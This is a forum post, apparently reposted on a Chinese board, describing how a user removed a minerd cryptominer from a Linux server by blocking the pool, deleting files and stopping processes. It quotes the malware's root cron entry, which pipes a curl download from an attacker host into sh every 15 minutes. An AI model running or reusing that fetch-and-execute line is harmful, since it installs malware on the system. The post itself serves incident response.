- 论坛徽章:
- 6
|
本帖最后由 RE_HASH 于 2016-07-16 21:37 编辑
外面的帖子:
I found the solution to removing minerd. I was lucky enough to find the actual script that was used to infect my server. All I had to do was remove the elements placed by this script -
On monkeyoto's suggestion, I blocked all communication with the mining pool server - iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
Removed the cron */15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh from /var/spool/cron/root and /var/spool/cron/crontabs/root.
Removed the directory /opt/yam.
Removed /root/.ssh/KHK75NEOiq.
Deleted the files /opt/minerd and /opt/KHK75NEOiq33.
Stopped the minerd process - pkill minerd.
Stopped lady - service lady stop.
I ran ps -eo pcpu,args --sort=-%cpu | head, top -bn2 |sed -n '7,25'p and ps aux | grep minerd after that and the malware was nowhere to be seen.
I still need to figure out how it gained access into the system but I was able to disable it this way. |
|